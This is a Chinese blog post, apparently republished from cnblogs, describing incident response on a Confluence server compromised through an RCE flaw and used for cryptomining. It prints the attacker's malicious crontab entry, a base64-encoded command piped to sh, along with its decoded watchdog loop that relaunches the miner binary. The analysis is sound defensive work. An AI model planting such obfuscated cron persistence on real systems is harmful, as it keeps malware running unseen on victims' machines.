经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
confluence 挖矿木马应急响应 - APT-101
来源:cnblogs  作者:APT-101  时间:2019/9/10 10:53:07  对本文有异议

 

最近遇到一台confluence wiki主机被挖矿,收到CPU 告警异常之后,登录查看,进行分析。

top c 命令查看,果然CPU 已经资源已经被吃完了。。

 

 

 

看到用户是confluence,100%的肯定是confluence的RCE漏洞导致的,因为大部门的使用这个软件的都是破解版本,官方的补丁都是针对付费用户的。

具体漏洞细节:

https://github.com/jas502n/CVE-2019-3396

漏洞利用RCE:

 

 

 

 

处理过程:

1. 先封掉外网HTTP 端口,后续业务走VPN 通道访问

2. 查杀进程

 

 

3. 查杀完成之后,发现进程一直在启动

想到是否已经写了计划任务

crontab -l

cat /etc/crontab

都没有先关信息,最后想到应该没提权到root

crontab -l -u  confluence 查到了相关的恶意计划任务,

通过root cd /var/spool/cron/confluence

:> confluence 清空防止差生新的进程

 

 

* * * * * echo -n  "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCAyNzMxNiA+L2Rldi9udWxsIDI+JjEgOyB0aGVuIC9vcHQvYXRsYXNzaWFuL2NvbmZsdWVuY2UvdGVtcC9ya3dwcm4gOyBmaSA7IGRvbmUgKSAmIHBpZD0kISA7IChzbGVlcCAyNSAmJiBraWxsIC05ICRwaWQpICY=" | base64 -d | sh >/dev/null 2>&1

base64 解密为:

( while : ; do sleep 5 ; if ! kill -0 27316 >/dev/null 2>&1 ; then rkwprn ; fi ; done ) & pid=$! ; (sleep 25 && kill -9 $pid) &

我的神,死循环怪不得CPU 那么高。。。

cd /opt/atlassian/confluence/temp/ 

删除相关恶意二进制文件,然后重启 confluence 进程,观察了5分钟左右,发现未未产生新的恶意进程。

 

 

 

 

 

这些文件可能都有异常.文件的时间跟故障时间,基本一致,阐述即可

 

 

再次扫描,系统正常。

 

4. 针对Linux的恶意二进制文件进行在线分析

微步在线可以查杀出来:

 

 

奇虎360竟然没有报毒。。。。。

 

 

 还是去权威的:https://www.virustotal.com

 

 

 

识别出是恶意的Linux二进制程序

从刚才产生的缓存文件看,应该是集挖矿,DDoS 为一体的一个木马文件,因为看到了.ntp的隐藏目录,哈哈,别问我为什么知道

 

关于分析Linux的恶意二进制文件,本人太蔡!!!

原文链接:http://www.cnblogs.com/hack404/p/11464890.html

 友情链接: NPS